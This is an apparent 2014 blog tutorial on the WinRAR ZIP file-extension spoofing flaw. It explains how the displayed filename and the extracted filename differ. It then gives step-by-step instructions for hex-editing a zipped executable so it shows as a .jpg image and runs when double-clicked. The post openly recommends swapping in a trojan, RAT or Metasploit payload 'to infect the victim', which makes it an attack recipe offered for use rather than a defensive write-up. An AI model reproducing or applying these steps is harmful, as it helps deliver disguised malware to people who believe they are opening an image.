Sunday, 4 May 2014

Winrar File Extension Spoofing 0day

winrar file extension spoofing oday

In March 2014, winrar file extension spoofing 0day was used wildly to hack many windows users.
In this tutorial, i will explain this vulnerability with some POC images and video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code. 

NOTE:

This tutorial is found working under windows 7 environment. For some reasons , it didn't work for my friends using windows 8. So, try it on win 7 if it doesn't work for you on win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, i am using havij software which is an sql injection tool but you can use some trojan or RAT to infect the victim.

2- Right click on this exe file and click on "Add to archive". Choose ZIP archive format to compress this file into a ZIP archive.

3- Run Hex Editor , Hex workshop or any hex editor and open this compressed ZIP archive in it. Go to the end of hex editor and find havij.exe and rename its extension to jpg like this havij.jpg.

winrar zip file extesion spoofing


4- Now open this zip archive. You will see havij.jpg icon in the archive. When you will double click it, it will run that havij.exe file. 
(This is just a demonstration, you can use your own metasploit payload, trojan or RATs instead of this havij.exe file)

Watch Video Tutorial: